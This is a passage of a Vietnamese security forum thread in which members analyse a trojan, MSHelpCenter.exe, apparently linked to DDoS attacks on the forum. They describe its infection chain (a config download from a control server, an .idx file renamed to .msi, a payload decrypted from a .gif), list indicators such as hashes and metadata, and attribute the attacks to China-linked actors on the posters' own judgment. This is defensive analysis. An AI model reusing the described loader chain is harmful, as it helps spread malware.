Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV...

Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 12:58:44 (+0700) | #145 | 244188
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

lequi wrote:

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây? 


Cám ơn nhiệt tình đáng quí của em. Mình làm việc này không chỉ cho HVA, mà còn có lơi cho công đồng, đất nước. Tôi sẽ phân tích các lý do của những hành động mà STL (tay sai cho Tầu) đã làm vừa qua. Việc phát hiện thông qua kỹ thuật mạng để biết STL liên quan chặt chẽ với chính quyền TQ đã khó rồi, nhưng việc sau đó lý giải một cách hơp lý lý do của các hành động của STL thời gian qua lai khó hơn rất nhiều.

Quay trở lai vấn đề của topic. Với các thông tin của các bạn trong đó có lequi tôi đã tìm thấy ít nhất 5 master website-server của STL và đã check kỹ vào chúng để có các thông tin. Chúng đặt ở nhiều nơi trên TG. Điều ngạc nhiên là trong số 5 website-webserver nói trên có một cái khá hoành tráng về quy mô và cấu hình. Không hiểu có phải webserver này đã bị STL thâm nhập chiếm quyền admin.hay không?
Chỉ mong các thông tin các bạn đưa ra là chính xác. Virus-Trojan liên hệ với các master-website này đúng là của STL, chứ không phải các hacker khác.

Một điều mà tôi thấy chúng ta làm chưa thật tốt là chưa xác định được chính xác các process, service.. nào thưc sự kết nối đến các master website nói trên.
Thưc ra để xác định chính xác điều này không dễ như tôi đã từng nhận định một cách chủ quan ở 1 bài viết trong topic này. Với tôi thì như vậy. Với các bạn khác có thể không như vậy.

Các soft mà các bạn dùng như Wireshark và Process Monitoring... thưc ra không đáp ứng yêu cầu của ta, cũng không hẳn là đồ chuyên nghiệp của dân chơi mạng. Trên wireshark ta chỉ thấy các IP kết nôi (trừ khi phân tích kỹ bên trong packet thì có thể thêm vài thông tin) nhưng không thể biết các process kích hoạt kết nối. Còn trong Process Monitoring thì thấy tên các process (nhiều là khác) nhưng không hề biết các connection...vân vân.
Theo tôi trong trường hợp này các bạn nên sử dung các Advanced firewall (loại mới-tiên tiến). Với firewall loai này, cùng lúc, các ban biết tên, vị trí trên directory các process kích hoạt các kết nối, đia chỉ IP và computer name của mục tiêu và kể cả RX -TX....
Firewall cũng cho phép ta ngăn sư thâm nhập sâu vào máy của virus 1 cách rất hiệu quả vì một malicious process nào của virus khởi chạy là firewall chặn lại chờ sự cho phép của ta.

Vì vậy nếu ban lequi cần một firewall như vậy, thì tôi sẽ gửi đến bạn qua email. Hoăc bạn tự tìm cái tốt hơn. Có công cụ này việc ban giúp, làm sẽ dễ hơn
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:07:32 (+0700) | #146 | 244189
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

lequi wrote:

acoustics89 wrote:
@lequi: chắc anh em lại cùng với bạn phối hợp lấy mẫu như hôm qua. xong bạn up mẫu lên đây nhé, mọi người phân tích cũng nhanh thôi 

Mình rất sẵn lòng.

Mớ packet và các nghi ngờ của mình bắt đầu xuất hiện từ sau khi chạy setup unikey này http://nethoabinh.com/showthread.php?t=315). Mình vẫn chưa lần mò ra được gì smilie, có thể máy mình vẫn đang có trojian, nhưng có thể đây là 1 phiên bản trước đây khá lâu (tháng 11/2009), các user-agent và url đều khác, mặc dù cấu trúc là giống nhau (Gozilla và ?cpn).

Không biết mình phải làm gì tiếp đây? 


Updated: Sau khi điều tra với anh em HVA xong, bạn có thể quét với CMC Antivirus (bản miễn phí nhưng luôn được cập nhật như bản CMCIS ấy smilie ):
http://pcu.cmclab.net/download/setupCMCIS.exe

Tiếp theo, bạn gửi boot log với Process Monitor:
Hướng dẫn scan và gửi boot log với Process Monitor
http://support.cmclab.net/vn/tut0rial/h4327899ng-d7851n-scan-v224-g7917i-boot-log-v7899i-process-monitor/

Rồi gửi log Autoruns:
Hướng dẫn scan và gửi log Autoruns
http://support.cmclab.net/vn/tut0rial/huong-dan-scan-va-gui-log-autoruns/
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:17:36 (+0700) | #147 | 244190
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
Ấy lequi đừng quét virus vôi. Cứ để thế mới điều nghiên được chứ.
Xong việc thì quét theo hướng dẫn trợ giúp của bolzano_1989
The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:28:01 (+0700) | #148 | 244192
ptv_vbhp
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:16:44
Messages: 11
Offline
[Profile] [PM]
Có 1 điều mà em vẫn cứ thắc mắc giống bác PXMMRF là thế cái file MS...exe được đẻ ở bệnh viện nào thế smilie vả lại 2 anh chàng cùng tên Ms.... có quan hệ đến nhau gì ko ấy nhở ?
Còn 1 cái nữa em hỏi anh acoustics89 với smilie. Theo như em phân tích file Ms...exe thì thấy cái hàm 401F90 là để giải mã lần 2 từng xâu trong file DAT down về( sau khi giải mã lần 1 file DAT đó để có link down con VB) thì được các xâu lưu trữ lại nhưng em thấy chả được cái xâu nào sau khi giải mã lần 2 ấy cả ???
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 13:48:45 (+0700) | #149 | 244195
rang0
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 10:55:47
Messages: 19
Offline
[Profile] [PM]

PXMMRF wrote:

1 -Service, process nào download các file MSHelpCenter.exe về máy hoăc process nào inject malicious code vào file này?? ( Ngay từ lúc đầu file MSHelpCenter.exe có bị nhúng virus hay không?)

2- Virus-Trojạn nằm trong file MSHelpCenter.idx có quan hệ tác động gì đến file MSHelpCenter.exe, khi nào, tiến trình xảy ra theo trình tự thế nào khi máy bị nhiễm virus?

3- File đầu tiên gây nhiễm cho máy user mà user download về trên mạng (thí dụ Vietkey, Unikey....) là file nào trong trường hợp này.? Dĩ nhiên không phải là chính các file MSHelpCenter.exe hay MSHelpCenter.idx, vì dung lượng của chúng quá lơn, mà cũng chẳng ai lai cần download chúng về làm gì cả

Vậy bạn có ý kiến thế nào về những vấn đề tôi đang thắc mắc, để tôi có thể giải toả và có kết luận cuối cùng cho mình?? 


Em xin trả lời :

1. Ý thứ (1) và thứ (3) của anh (nội dung gần giống nhau) thì hiện giờ em nghĩ không thể xác định được (với chỉ những file mà asaxin up lên cho chúng ta), có lẽ cần có thêm thời gian để phát hiện ra thêm điều gì đó smilie.

2. Cái file MSHelpCenter.idx thì em thấy nó sẽ được chạy hay không là phụ thuộc vào nội dung file cấu hình mà MSHelpCenter.exe tải về từ control server. MSHelpCenter.idx được rename thành file .msi, nhận tham số và thực thi. Nhưng với file MSHelpCenter.idx nhận được từ asaxin thì hình như không bao giờ làm nhiệm vụ smilie.

Edited : Ở trên em nhầm, file MSHelpCenter.idx là file trung gian, nó sẽ được MSHelpCenter.exe rename thành một file random.msi, sau đó MSHelpCenter.exe truyền tham số cho file .msi này (thông qua file .cfg). File .msi sẽ run và kiểm tra tham số và cuối cùng chỉ là để execute file AcrobatUpdater.exe (đã được decrypt từ file images.gif)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 26/07/2011 14:47:25 (+0700) | #150 | 244198
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

acoustics89 wrote:
Em toàn dùng máy ảo để desassembling code , tất cả đều trong máy ảo cả. Máy ảo em tự cài từ đầu, các phần mềm bên trong cũng qua kiểm duyệt hết rồi

Bây giờ đơn giản là anh dùng 1 chương trình Hex editor, jump đến các offset trong file MSHelpCenter.exe như em nói xem có đúng là nó thế hay không, chương trình hex editor nào cũng được. Nếu nó đúng, thì đó là 1 bằng chứng, 1 ví dụ về việc : các av bây giờ cũng chưa phải quá mạnh, việc tin tưởng vào nó là hơi phiêu lưu và mạo hiểm. Mặc dù đã được trang bị các công nghệ như emulator, Heurristic, thì vẫn không thể tin tưởng được. Có thể là 1 chiêu marketing của các AV...

Và bây giờ, công nghệ tạo ra malware đang đi trước chung ta 1 bước. Hiện thực đáng sợ này bao giờ mới chấm dứt đây 


Hì hì, chỉ nhìn vô cái metadata của MsHelpCenter.exe là thấy không phải hiền lành rồi:

Code:
Meta-data
=======
File:    MsHelpCenter.exe
Size:    9332736 bytes
Type:    PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:     915e9432ca9414a771071ee0cc115930
SHA1:    9ec74f80c7b03ff2ab4ecbe57b5a1d0296a3bee6
ssdeep:  3072:acFDLF09RoMPXa5zgKSfpBitAggb4d/VpvF2CmsNd:tFDLFFW8gbpUt7V7Vms
Date:    0x4D1868C7 [Mon Dec 27 10:21:59 2010 UTC]
EP:      0x403272 .text 0/5
CRC:     Claimed: 0x30c13, Actual: 0x8e87d2 [SUSPICIOUS]

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
3 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|